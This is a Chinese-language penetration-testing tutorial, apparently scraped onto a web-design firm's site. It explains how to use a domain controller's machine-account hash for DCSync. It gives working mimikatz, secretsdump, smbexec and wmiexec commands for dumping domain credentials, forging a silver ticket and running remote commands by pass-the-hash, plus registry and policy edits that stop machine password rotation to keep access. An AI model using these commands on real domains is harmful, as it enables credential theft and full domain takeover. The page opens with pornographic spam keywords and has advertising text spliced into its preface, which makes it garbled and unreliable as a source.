日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
域滲透——使用MachineAccount實現(xiàn)DCSync

 0x00 前言

你所需要的網(wǎng)站建設(shè)服務(wù),我們均能行業(yè)靠前的水平為你提供.標(biāo)準(zhǔn)是產(chǎn)品質(zhì)量的保證,主要從事成都做網(wǎng)站、網(wǎng)站建設(shè)、外貿(mào)營銷網(wǎng)站建設(shè)、企業(yè)網(wǎng)站建設(shè)、成都手機網(wǎng)站制作、網(wǎng)頁設(shè)計、品牌網(wǎng)站設(shè)計、網(wǎng)頁制作、做網(wǎng)站、建網(wǎng)站。創(chuàng)新互聯(lián)公司擁有實力堅強的技術(shù)研發(fā)團隊及素養(yǎng)的視覺設(shè)計專才。

在之前的文章《域滲透——DCSync》提到過DCSync的利用條件:

獲得以下任一用戶的權(quán)限:

· Administrators組內(nèi)的用戶

· Domain Admins組內(nèi)的用戶

· Enterprise Admins組內(nèi)的用戶

· 域控制器的計算機帳戶

本文將要補全上篇文章中未提到的最后一種利用方法,介紹如何通過域控制器的計算機帳戶口令hash實現(xiàn)DCSync。

0x01 簡介

本文將要介紹以下內(nèi)容:

· MachineAccount簡介

· 獲得MachineAccount口令hash的方法

· 使用MachineAccount實現(xiàn)DCSync

· 防御檢測

0x02 MachineAccount簡介

MachineAccount是每臺計算機在安裝系統(tǒng)后默認(rèn)生成的計算機帳戶。

計算機帳戶的密碼存儲在注冊表的位置:HKLM\SECURITY\Policy\Secrets\$machine.ACC。

如果計算機加入域中,會將計算機帳戶的密碼同步到域控制器并保存在域控制器的NTDS.dit文件中。

計算機帳戶的密碼默認(rèn)每30天自動更新,密碼長度為120個字符,所以說,即使獲得了計算機帳戶密碼的hash,也很難還原出計算機帳戶的明文口令。

關(guān)閉當(dāng)前計算機帳戶密碼自動更新的兩種方法(適用于工作組):

1.修改組策略

組策略位置:

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\

如下圖:

默認(rèn)未啟用,如果設(shè)置為啟用后,將會停止更新密碼。

參考資料:

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc785826(v=ws.10)

2.直接修改注冊表

注冊表位置:HKLM\System\CurrentControlSet\Services\Netlogon\Parameters\

將DisablePasswordChange的值設(shè)為1。

關(guān)閉域內(nèi)計算機帳戶密碼自動更新的兩種方法(適用于域網(wǎng)絡(luò)):

1.修改組策略

這里需要修改域組策略,在域控制器上打開Group Policy Management后,選擇Default Domain Policy。

如下圖:

組策略位置:

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\

2.修改組策略的配置文件

Default Domain Policy對應(yīng)的guid為31B2F340-016D-11D2-945F-00C04FB984F9

配置文件路徑為:

例如我的測試環(huán)境下,路徑對應(yīng)為:

\\test.com\SYSVOL\test.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit

修改文件GptTmpl.inf,在[Registry Values]下添加新的內(nèi)容:

MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange=4,1

如下圖:

強制域控制器更新組策略,命令如下:

gpupdate /force

配置完成,將系統(tǒng)時間調(diào)快30天,hash保持不變。

0x03 獲得MachineAccount口令hash的方法

1.通過注冊表文件導(dǎo)出當(dāng)前計算機帳戶的口令hash

mimikatz命令示例:

privilege::debug
token::elevate
lsadump::secrets

返回的結(jié)果中,$machine.ACC項對應(yīng)計算機帳戶,如下圖:

其他從注冊表導(dǎo)出的方法可參考之前的文章《滲透技巧——通過SAM數(shù)據(jù)庫獲得本地用戶hash》

2.使用DCSync導(dǎo)出所有計算機帳戶的口令hash

(1)使用mimikatz

在域控制器上使用mimikatz導(dǎo)出域內(nèi)所有用戶的hash,命令示例:

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

其中以$字符結(jié)尾的為計算機帳戶。

其他環(huán)境下的使用方法可參考之前的文章《域滲透——DCSync》。

(2)使用secretsdump.py

需要安裝Python環(huán)境和Impacket包,實際使用時可以將Python代碼編譯成exe文件。

命令示例:

python secretsdump.py test/Administrator:DomainAdmin123!@192.168.1.1

secretsdump.py相比于mimikatz,最大的優(yōu)點是支持從域外的計算機連接至域控制器。

secretsdump.py的實現(xiàn)原理:

使用計算機帳戶口令hash通過smbexec或者wmiexec遠(yuǎn)程連接至域控制器并獲得高權(quán)限,進(jìn)而從注冊表中導(dǎo)出本地帳戶的hash,同時通過Dcsync或從NTDS.dit文件中導(dǎo)出所有域用戶的hash。

3.通過漏洞CVE-2020-1472

參考資料:

https://www.secura.com/pathtoimg.php?id=2055

CVE-2020-1472能夠在未授權(quán)的狀態(tài)下遠(yuǎn)程修改目標(biāo)計算機帳戶的口令hash。

注:

CVE-2020-1472只能修改域控制器NTDS.dit文件中保存的計算機帳戶hash,無法修改注冊表中保存的本地計算機帳戶hash。

當(dāng)域控制器中NTDS.dit文件和注冊表文件的計算機帳戶口令hash不同步時,有可能影響系統(tǒng)的正常功能。

0x04 使用MachineAccount實現(xiàn)DCSync

例如,我們獲得了域控制器DC1的計算機帳戶口令hash為7da530fba3b15a2ea21ce7db8110d57b。

1.使用mimikatz

這里需要制作白銀票據(jù)(Silver Ticket),接著獲得LDAP服務(wù)的訪問權(quán)限,細(xì)節(jié)可參考之前的文章《域滲透——Pass The Ticket》。

命令示例:

mimikatz "kerberos::golden /domain:test.com /sid:S-1-5-21-254706111-4049838133-2416586677 /target:DC1.test.com /service:LDAP /rc4:7da530fba3b15a2ea21ce7db8110d57b /user:krbtgt /ptt" "lsadump::dcsync /domain:test.com /all /csv" exit

在細(xì)節(jié)上需要注意以下方面:

· 只能在域內(nèi)計算機上運行,不支持域外

· /sid表示域的sid,獲取方法可參考之前的文章《滲透基礎(chǔ)——活動目錄信息的獲取》

· /rc4表示計算機帳戶的NTLM hash

· /user:krbtgt表示偽造成用戶krbtgt,生成票據(jù)

注:域sid的簡單獲取方法。

任一域用戶的sid去除最后一位就是域的sid。

2.使用secretsdump

命令示例:

python secretsdump.py -hashes :7da530fba3b15a2ea21ce7db8110d57b test/DC1$@192.168.1.1

在細(xì)節(jié)上需要注意以下方面:

· secretsdump支持從域外的計算機連接至域控制器

· 如果使用域內(nèi)普通計算機帳戶的口令hash連接對應(yīng)的計算機,那么會失敗,提示rpc_s_access_denied

· 可以通過wmiexec.py或smbexec.py遠(yuǎn)程執(zhí)行cmd命令

命令示例:

python smbexec.py -hashes :7da530fba3b15a2ea21ce7db8110d57b test/DC1$@192.168.1.1 whoami /priv
python wmiexec.py -hashes :7da530fba3b15a2ea21ce7db8110d57b test/DC1$@192.168.1.1 whoami /priv

注:

使用計算機帳戶具有高權(quán)限,如下圖:

0x05 防御檢測

檢測DCSync后門的方法可參考《域滲透——DCSync》

站在防御的角度,如果域管理員的權(quán)限被攻擊者獲得,在嘗試踢出攻擊者的過程中,不僅需要修改域管理員用戶的口令,同樣需要更新計算器帳戶的口令hash,檢測域組策略是否被配置成開啟DisablePasswordChange

0x06 小結(jié)

本文介紹了通過域控制器的計算機帳戶口令hash實現(xiàn)DCSync的方法,分析利用思路,給出防御建議。


網(wǎng)站名稱:域滲透——使用MachineAccount實現(xiàn)DCSync
當(dāng)前網(wǎng)址:http://m.5511xx.com/article/dpjeied.html